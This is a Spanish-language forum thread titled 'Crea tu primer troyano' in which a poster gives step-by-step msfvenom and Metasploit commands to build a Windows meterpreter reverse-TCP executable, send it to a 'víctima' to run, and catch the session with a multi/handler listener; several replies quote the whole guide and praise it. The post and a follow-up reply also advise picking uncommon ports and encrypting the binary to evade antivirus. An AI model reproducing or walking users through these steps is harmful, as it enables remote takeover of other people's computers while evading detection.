Crea tu primer troyano

Dr.Calimocho

Miembro muy activo
18 Ago 2019
45
49
Hola noderos,

He decidido traeros un método de cómo crear vuestro propio Troyano, es una de las muchas formas que existe, esta es la más limpia (la creas tú desde zero) e interesante para empezar. Espero que la disfrutéis!

⚠No me hago responsable del uso que le deis a esta guía.⚠

Todo el trabajo se llevará en el sistema operativo de Kali Linux, dicho esto empecemos:

1. En primer lugar en nuestra consola ejecutaremos el programa msfvenom el cual nos mostrará una lista de opciones. Es recomendable pero no obligatorio familiarizarse con todas las opciones que nos da.

2. Nuestro segundo paso será abrir la lista de payloads que el programa nos ofrece, para ello pondremos:

Código:
msfvenom -l payloads

Esto nos arrojará una lista de paylods dependiendo de nuestras necesidades, para windows, iOS, android, de x64 o de x32... etc

A continuación os dejo un ejemplo:

nodo2.png


3. Nosotros (en mi caso) seleccionaremos un meterpreter para Windows.

¿Que es un meterpreter?

Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular procesos del sistema y/o terminarlos. Es decir, que si logras entrar en el sistema de la víctima te puedes hacer con el control de todo su sistema, y la ventaja de esto es que es difícil que te lo detecten los antivirus (el nuestro será muy sencillo, ya verás xq).

Entonces introduciremos el siguiente comando:

Código:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.00.00 lport=4444 -f exe -o nodo313.exe

Vamos a explicarlo por partes:

-p windows/meterpreter/reverse_tcp = Esto es el payload que hemos escogido
lhost = nuestra dirección IP yo he puesto 192.168.00.00 que en teoría sería la mÍa (Obviamente no es mi IP).
lpor = es el puero por el cual estableceremos la conexión (mirarlo bien y no escojáis uno muy común que sino os lo pillan facil)
-f exe = quiere decir que será un ejecutable
-o nodo313.exe = el nombre de nuestro troyano

Nos tendría que quedar así:

nodo31.png


Esto nos creará el siguiente archivo, el cual se lo mandaremos a la víctima y esta lo tendrá que ejecutar:

nodo7.png


4. Registramos nuestro programa en metasploit en modo multi handler (para poder establecer conexión con la víctima):

Código:
use exploit/multi/handler
Código:
set payload windows/meterpreter/reverse_tcp
Código:
set lhost 192.168.00.00
Código:
set lport 4444

Nos queda algo así:

nodo5.png


6. Una vez hecho el ultimo paso comprobaremos si nuestra configuración ha quedado correctamente configurada. Para ello pondremos el comando:

Código:
show options

Esto nos arrojará la siguiente información:

nodo6.png


7. Ejecutaremos nuestro Troyano:

Escribimos el siguiente comando para ponerlo a la escucha:

Código:
exploit

Esto está a la escucha esperando a que nuestra víctima abra el programa :)

FIN DE LA GUIA :)

Espero que os haya gustado esta guía y os sea util!

Si le dais mucho amor a este post os enseñaré a encriptar el troyano para que ningún (o casi ningún) antivirus os lo detecte :)
 

Goble_0801

Miembro
5 Abr 2020
19
2
¿Puede ser detectado por un anti-virus? Ya he intendado crear un troyano parecido con "unicorn", pero hasta windows defender lo pilló...
 
  • Like
Reacciones : Dr.Calimocho

Dr.Calimocho

Miembro muy activo
18 Ago 2019
45
49
¿Puede ser detectado por un anti-virus? Ya he intendado crear un troyano parecido con "unicorn", pero hasta windows defender lo pilló...
Tienes que encriptar el troyano y cambiar el sistema binario, cuanto más lo modules (no me sale el nombre xd) más indetectable lo harás
 

/Jimmyzza\

Miembro muy activo
Noderador
Nodero
Noder
24 Ene 2019
630
264
Hola noderos,

He decidido traeros un método de cómo crear vuestro propio Troyano, es una de las muchas formas que existe, esta es la más limpia (la creas tú desde zero) e interesante para empezar. Espero que la disfrutéis!

⚠No me hago responsable del uso que le deis a esta guía.⚠

Todo el trabajo se llevará en el sistema operativo de Kali Linux, dicho esto empecemos:

1. En primer lugar en nuestra consola ejecutaremos el programa msfvenom el cual nos mostrará una lista de opciones. Es recomendable pero no obligatorio familiarizarse con todas las opciones que nos da.

2. Nuestro segundo paso será abrir la lista de payloads que el programa nos ofrece, para ello pondremos:

Código:
msfvenom -l payloads

Esto nos arrojará una lista de paylods dependiendo de nuestras necesidades, para windows, iOS, android, de x64 o de x32... etc

A continuación os dejo un ejemplo:

Ver el archivo adjunto 2860

3. Nosotros (en mi caso) seleccionaremos un meterpreter para Windows.

¿Que es un meterpreter?

Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular procesos del sistema y/o terminarlos. Es decir, que si logras entrar en el sistema de la víctima te puedes hacer con el control de todo su sistema, y la ventaja de esto es que es difícil que te lo detecten los antivirus (el nuestro será muy sencillo, ya verás xq).

Entonces introduciremos el siguiente comando:

Código:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.00.00 lport=4444 -f exe -o nodo313.exe

Vamos a explicarlo por partes:

-p windows/meterpreter/reverse_tcp = Esto es el payload que hemos escogido
lhost = nuestra dirección IP yo he puesto 192.168.00.00 que en teoría sería la mÍa (Obviamente no es mi IP).
lpor = es el puero por el cual estableceremos la conexión (mirarlo bien y no escojáis uno muy común que sino os lo pillan facil)
-f exe = quiere decir que será un ejecutable
-o nodo313.exe = el nombre de nuestro troyano

Nos tendría que quedar así:

Ver el archivo adjunto 2862

Esto nos creará el siguiente archivo, el cual se lo mandaremos a la víctima y esta lo tendrá que ejecutar:

Ver el archivo adjunto 2858

4. Registramos nuestro programa en metasploit en modo multi handler (para poder establecer conexión con la víctima):

Código:
use exploit/multi/handler
Código:
set payload windows/meterpreter/reverse_tcp
Código:
set lhost 192.168.00.00
Código:
set lport 4444

Nos queda algo así:

Ver el archivo adjunto 2861

6. Una vez hecho el ultimo paso comprobaremos si nuestra configuración ha quedado correctamente configurada. Para ello pondremos el comando:

Código:
show options

Esto nos arrojará la siguiente información:

Ver el archivo adjunto 2863

7. Ejecutaremos nuestro Troyano:

Escribimos el siguiente comando para ponerlo a la escucha:

Código:
exploit

Esto está a la escucha esperando a que nuestra víctima abra el programa :)

FIN DE LA GUIA :)

Espero que os haya gustado esta guía y os sea util!

Si le dais mucho amor a este post os enseñaré a encriptar el troyano para que ningún (o casi ningún) antivirus os lo detecte :)
Buen post!!
 
  • Like
Reacciones : s0mgvcc y Dr.Calimocho

destapeman

FUCK PUSSYS, YES BADASS
Miembro del equipo
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Moderador
Noderador
Nodero
Noder
11 Ene 2019
3.101
4.361
post muy interesante, no tengo ni idea de programar pero muy buen post
Si te ha gustado el contenido apóyalo con un like hombre, que no cuesta dinero.

Los likes están para que los creadores de contenido sepan si lo que suben gusta o no. Si tú no se lo demuestras, o cambia de posts, o no lo sube directamente.
 
  • Love
Reacciones : Dr.Calimocho

Dr.Calimocho

Miembro muy activo
18 Ago 2019
45
49
Si te ha gustado el contenido apóyalo con un like hombre, que no cuesta dinero.

Los likes están para que los creadores de contenido sepan si lo que suben gusta o no. Si tú no se lo demuestras, o cambia de posts, o no lo sube directamente.
Y por esto te amo 😍 hahahaha
Gracias!! :D
 

lilsnake

"HUMILDAD"
Burgués de Nodo
Noderador
Nodero
Noder
12 Nov 2019
1.290
1.257
Hola noderos,

He decidido traeros un método de cómo crear vuestro propio Troyano, es una de las muchas formas que existe, esta es la más limpia (la creas tú desde zero) e interesante para empezar. Espero que la disfrutéis!

⚠No me hago responsable del uso que le deis a esta guía.⚠

Todo el trabajo se llevará en el sistema operativo de Kali Linux, dicho esto empecemos:

1. En primer lugar en nuestra consola ejecutaremos el programa msfvenom el cual nos mostrará una lista de opciones. Es recomendable pero no obligatorio familiarizarse con todas las opciones que nos da.

2. Nuestro segundo paso será abrir la lista de payloads que el programa nos ofrece, para ello pondremos:

Código:
msfvenom -l payloads

Esto nos arrojará una lista de paylods dependiendo de nuestras necesidades, para windows, iOS, android, de x64 o de x32... etc

A continuación os dejo un ejemplo:

Ver el archivo adjunto 2860

3. Nosotros (en mi caso) seleccionaremos un meterpreter para Windows.

¿Que es un meterpreter?

Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular procesos del sistema y/o terminarlos. Es decir, que si logras entrar en el sistema de la víctima te puedes hacer con el control de todo su sistema, y la ventaja de esto es que es difícil que te lo detecten los antivirus (el nuestro será muy sencillo, ya verás xq).

Entonces introduciremos el siguiente comando:

Código:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.00.00 lport=4444 -f exe -o nodo313.exe

Vamos a explicarlo por partes:

-p windows/meterpreter/reverse_tcp = Esto es el payload que hemos escogido
lhost = nuestra dirección IP yo he puesto 192.168.00.00 que en teoría sería la mÍa (Obviamente no es mi IP).
lpor = es el puero por el cual estableceremos la conexión (mirarlo bien y no escojáis uno muy común que sino os lo pillan facil)
-f exe = quiere decir que será un ejecutable
-o nodo313.exe = el nombre de nuestro troyano

Nos tendría que quedar así:

Ver el archivo adjunto 2862

Esto nos creará el siguiente archivo, el cual se lo mandaremos a la víctima y esta lo tendrá que ejecutar:

Ver el archivo adjunto 2858

4. Registramos nuestro programa en metasploit en modo multi handler (para poder establecer conexión con la víctima):

Código:
use exploit/multi/handler
Código:
set payload windows/meterpreter/reverse_tcp
Código:
set lhost 192.168.00.00
Código:
set lport 4444

Nos queda algo así:

Ver el archivo adjunto 2861

6. Una vez hecho el ultimo paso comprobaremos si nuestra configuración ha quedado correctamente configurada. Para ello pondremos el comando:

Código:
show options

Esto nos arrojará la siguiente información:

Ver el archivo adjunto 2863

7. Ejecutaremos nuestro Troyano:

Escribimos el siguiente comando para ponerlo a la escucha:

Código:
exploit

Esto está a la escucha esperando a que nuestra víctima abra el programa :)

FIN DE LA GUIA :)

Espero que os haya gustado esta guía y os sea util!

Si le dais mucho amor a este post os enseñaré a encriptar el troyano para que ningún (o casi ningún) antivirus os lo detecte :)
no tengo ni idea de nada pero enhorabuena de todos modos, me guardo el post para un futuro
 
  • Like
Reacciones : Dr.Calimocho
Arriba Pie